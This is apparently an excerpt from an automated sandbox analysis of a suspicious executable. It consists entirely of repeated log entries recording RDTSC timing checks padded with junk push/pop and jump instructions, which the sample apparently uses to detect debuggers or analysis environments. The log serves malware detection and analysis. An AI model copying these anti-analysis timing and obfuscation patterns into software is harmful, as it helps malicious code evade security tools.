Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 100D5C9 second address: 100D5D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3460BFB96Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10673D6 second address: 10673E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F3460CF07F6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10673E0 second address: 1067400 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3460BFB973h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10676C4 second address: 10676CE instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3460CF07F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10676CE second address: 10676D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10676D4 second address: 10676EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F3460CF07F6h 0x0000000a jmp 00007F3460CF07FEh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 106781A second address: 106781E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 106781E second address: 1067844 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0802h 0x00000007 jmp 00007F3460CF07FDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 106B31A second address: 106B321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 106E522 second address: 106E541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007F3460CF07FEh 0x0000000d pop esi 0x0000000e push esi 0x0000000f jo 00007F3460CF0802h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1072401 second address: 1072405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1072C04 second address: 1072C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1072D6F second address: 1072D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jng 00007F3460BFB966h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1072D7D second address: 1072D8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F3460CF07F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1072D8C second address: 1072D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1073358 second address: 107335E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1073764 second address: 1073774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007F3460BFB972h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1073774 second address: 1073786 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3460CF07F6h 0x0000000a jl 00007F3460CF07FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 107218F second address: 1072193 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1072193 second address: 107219F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1075ED2 second address: 1075EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460BFB96Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1078669 second address: 107868D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3460CF07F6h 0x0000000a popad 0x0000000b jnc 00007F3460CF0809h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1078917 second address: 107891F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 107CDC9 second address: 107CDE8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F3460CF07FFh 0x0000000e jnl 00007F3460CF07F6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 107D386 second address: 107D3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460BFB975h 0x00000009 push edx 0x0000000a jo 00007F3460BFB966h 0x00000010 jmp 00007F3460BFB96Fh 0x00000015 pop edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F3460BFB96Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 push edi 0x00000023 pop edi 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 107D3CD second address: 107D3ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0806h 0x00000007 jo 00007F3460CF07F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 107D3ED second address: 107D3F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3460BFB966h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1082DB6 second address: 1082DBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1082DBC second address: 1082DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnc 00007F3460BFB966h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10815AF second address: 10815B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3460CF07F6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10815B9 second address: 10815F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB970h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F3460BFB979h 0x00000011 pop eax 0x00000012 popad 0x00000013 jnp 00007F3460BFB980h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10815F5 second address: 10815FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1081A22 second address: 1081A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 jc 00007F3460BFB966h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1081F13 second address: 1081F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1081F17 second address: 1081F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3460BFB966h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1082A51 second address: 1082A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0804h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1082A6F second address: 1082A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1082A75 second address: 1082A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1086770 second address: 108677A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3460BFB966h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108677A second address: 108678E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3460CF07F6h 0x00000008 jnc 00007F3460CF07F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108678E second address: 1086792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1086792 second address: 1086798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1085FD4 second address: 1085FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1086139 second address: 1086147 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3460CF07F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1086147 second address: 108614B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108614B second address: 1086151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1086482 second address: 1086488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1086488 second address: 108648C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108C3C3 second address: 108C3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108C3CB second address: 108C3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108C971 second address: 108C977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108C977 second address: 108C981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108C981 second address: 108C987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108C987 second address: 108C98B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108C98B second address: 108C991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108D192 second address: 108D196 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108D9DD second address: 108D9FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460BFB970h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F3460BFB966h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108D9FB second address: 108DA16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0807h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108DA16 second address: 108DA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 108DA1C second address: 108DA46 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3460CF080Eh 0x00000008 jmp 00007F3460CF0808h 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F3460CF07F6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1096B1E second address: 1096B23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1096B23 second address: 1096B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1096C54 second address: 1096C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3460BFB966h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1096C60 second address: 1096C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1096C64 second address: 1096C7A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3460BFB966h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F3460BFB966h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1096C7A second address: 1096C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1096C7E second address: 1096C82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10972FE second address: 1097324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F3460CF07F6h 0x0000000d jmp 00007F3460CF0809h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1097324 second address: 1097328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 1097328 second address: 109732E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109DE1A second address: 109DE1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109DF90 second address: 109DF94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109DF94 second address: 109DFA0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3460BFB966h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109DFA0 second address: 109DFB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3460CF07FDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109DFB1 second address: 109DFB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109DFB5 second address: 109DFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109DFC2 second address: 109DFCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3460BFB966h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109E677 second address: 109E693 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3460CF0808h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109E693 second address: 109E6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3460BFB96Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109E805 second address: 109E80A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109EB51 second address: 109EB55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109ECE2 second address: 109ECEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109ECEE second address: 109ECF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109ECF2 second address: 109ECF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109F40F second address: 109F41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3460BFB966h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109F41B second address: 109F42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3460CF07FBh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109D9AD second address: 109D9B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109D9B1 second address: 109D9C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3460CF07FEh 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 109D9C7 second address: 109D9CD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A4871 second address: 10A4875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A4875 second address: 10A488B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3460BFB966h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F3460BFB966h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A488B second address: 10A488F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A488F second address: 10A4893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A78F5 second address: 10A78FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A78FC second address: 10A7916 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F3460BFB971h 0x00000008 pop edi 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A7329 second address: 10A732D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JDGCFBAFBF.exe RDTSC instruction interceptor: First address: 10A732D second address: 10A7331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
